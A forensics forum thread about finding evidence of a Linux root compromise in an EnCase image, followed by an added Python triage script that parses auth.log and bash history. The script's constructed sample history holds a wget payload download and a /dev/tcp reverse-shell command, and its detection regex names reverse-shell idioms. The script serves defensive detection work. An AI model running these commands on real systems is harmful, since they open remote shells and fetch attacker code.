exploit evidence from encase  

afsfr
(@afsfr)
Junior Member

We collected a Linux image in EnCase. We suspect one of the Linux applications was exploited and the attacker got root shell access through the exploit. Is there any way to find evidence of the exploit in EnCase? Thanks.

Posted : 12/12/2019 9:35 am
keydet89
(@keydet89)
Community Legend

We collected a Linux image in EnCase. We suspect one of the Linux applications was exploited and the attacker got root shell access through the exploit. Is there any way to find evidence of the exploit in EnCase? Thanks.

What's the Linux version?

What is the application?

Posted : 12/12/2019 11:55 am
Rich2005
(@rich2005)
Senior Member

We collected a Linux image in EnCase. We suspect one of the Linux applications was exploited and the attacker got root shell access through the exploit. Is there any way to find evidence of the exploit in EnCase? Thanks.

What's the Linux version?

What is the application?

I could be wrong, but I think (due to the language barrier) he's saying they don't know the method of entry and basically wants to know how to do an intrusion investigation in EnCase (i.e. not one specific app).

Posted : 12/12/2019 12:37 pm
Bunnysniper
(@bunnysniper)
Active Member

I could be wrong but I think (due to language barrier) he's saying they don't know…

Please have a look at his other questions. We are facing a person who does not even have beginner knowledge in digital forensics and is too lazy to read about the basics. "Don't feed the troll" - my 2 cents.

regards, Robin

Posted : 12/12/2019 12:47 pm
afsfr
(@afsfr)
Junior Member

We collected a Linux image in EnCase. We suspect one of the Linux applications was exploited and the attacker got root shell access through the exploit. Is there any way to find evidence of the exploit in EnCase? Thanks.

What's the Linux version?

What is the application?

I could be wrong, but I think (due to the language barrier) he's saying they don't know the method of entry and basically wants to know how to do an intrusion investigation in EnCase (i.e. not one specific app).

I have a vulnerable application, and the Linux kernel is also out of date. I need to provide evidence of the initial shell access. I'm not sure which exploit the hacker used to get shell access (which script did the hacker use? a buffer overflow or an LSASS exploit? OS or application level?). The compromise didn't cause the application to malfunction, but the hacker gained shell access to our LONDON data center Linux machine and further escalated to root. So the first-step intrusion evidence (remote shell access) is what I need to collect. You are right.

Posted : 13/12/2019 7:52 am
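The thread never gets to an answer, so here is an added example of the kind of triage that "find evidence of remote shell access and root escalation" usually starts with on a Linux image. It is not an EnCase feature and not code from any poster. It assumes the root filesystem has been exported from EnCase (or mounted read-only) under a directory such as /mnt/evidence, that the system uses Debian-style /var/log/auth.log, and that shell history survives in /root and /home/*/.bash_history. The auth.log lines, IP address and history below are constructed for illustration, not taken from a real case.

```python
"""Offline triage of a Linux filesystem for remote-shell and root-escalation evidence.

Added example for the thread above (not EnCase functionality, not a poster's code).
Assumes an exported/mounted root filesystem with Debian-style syslog auth logging.
"""
import re
from pathlib import Path

# Constructed sample /var/log/auth.log excerpt (syslog format); not real case data.
SAMPLE_AUTH_LOG = """\
Dec 10 02:14:07 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51902 ssh2
Dec 10 02:14:11 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51902 ssh2
Dec 10 02:15:40 web01 sshd[2230]: Accepted password for www-data from 203.0.113.7 port 51944 ssh2
Dec 10 02:16:02 web01 sudo:  www-data : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/bash
Dec 10 02:16:02 web01 sudo: pam_unix(sudo:session): session opened for user root by www-data(uid=33)
"""

# Constructed sample .bash_history for the compromised service account.
SAMPLE_HISTORY = """\
ls -la /tmp
wget http://203.0.113.7/x.sh -O /tmp/x.sh
bash -i >& /dev/tcp/203.0.113.7/4444 0>&1
sudo /bin/bash
"""

ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port (\d+)")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : TTY=(\S+) ; PWD=(\S+) ; USER=(\S+) ; COMMAND=(.+)")
# Downloader and reverse-shell idioms commonly left in shell history.
SUSPICIOUS_RE = re.compile(r"/dev/tcp/|nc (-e|-c)|ncat .* -e|python.*socket|wget |curl |chmod \+x|/tmp/")


def parse_auth_log(text):
    """Collect accepted SSH logins, failed attempts per source IP, and sudo-to-root commands."""
    findings = {"accepted": [], "failed_by_source": {}, "sudo_root": []}
    for line in text.splitlines():
        if m := ACCEPTED_RE.search(line):
            findings["accepted"].append(
                {"method": m[1], "user": m[2], "src": m[3], "port": int(m[4]), "line": line})
        elif m := FAILED_RE.search(line):
            findings["failed_by_source"][m[2]] = findings["failed_by_source"].get(m[2], 0) + 1
        elif (m := SUDO_RE.search(line)) and m[4] == "root":
            findings["sudo_root"].append({"user": m[1], "tty": m[2], "cmd": m[5].strip(), "line": line})
    return findings


def scan_history(text):
    """Return (1-based line number, line) for history entries matching SUSPICIOUS_RE."""
    return [(i, l) for i, l in enumerate(text.splitlines(), 1) if SUSPICIOUS_RE.search(l)]


def correlate(findings, history_hits):
    """Source IPs that both logged in over SSH and reappear in history (e.g. as a callback host)."""
    login_ips = {a["src"] for a in findings["accepted"]}
    return sorted(ip for ip in login_ips if any(ip in hit[-1] for hit in history_hits))


def triage_root(root):
    """Run the parsers over an exported/mounted root filesystem (hypothetical path layout)."""
    root = Path(root)
    auth = root / "var/log/auth.log"
    findings = parse_auth_log(auth.read_text(errors="replace") if auth.exists() else "")
    hits = []
    for hist in [root / "root/.bash_history", *root.glob("home/*/.bash_history")]:
        if hist.exists():
            hits += [(str(hist), i, l) for i, l in scan_history(hist.read_text(errors="replace"))]
    return findings, hits


if __name__ == "__main__":
    f = parse_auth_log(SAMPLE_AUTH_LOG)
    h = scan_history(SAMPLE_HISTORY)
    print("accepted logins:", f["accepted"])
    print("failed attempts by source:", f["failed_by_source"])
    print("sudo to root:", f["sudo_root"])
    print("suspicious history lines:", h)
    print("login IPs also seen in history:", correlate(f, h))
    # For a real image: findings, hits = triage_root("/mnt/evidence")
```

The point of `correlate` is the timeline a case report needs: a brute-force burst followed by an accepted login from the same address, a sudo to root on the same pts, and that address reappearing as the reverse-shell target in history. On a real image also check wtmp/btmp and lastlog, the application's own logs, and the mtime/ctime of files under /tmp and the service account's home, since bash history is often cleared and is the weakest of these artifacts.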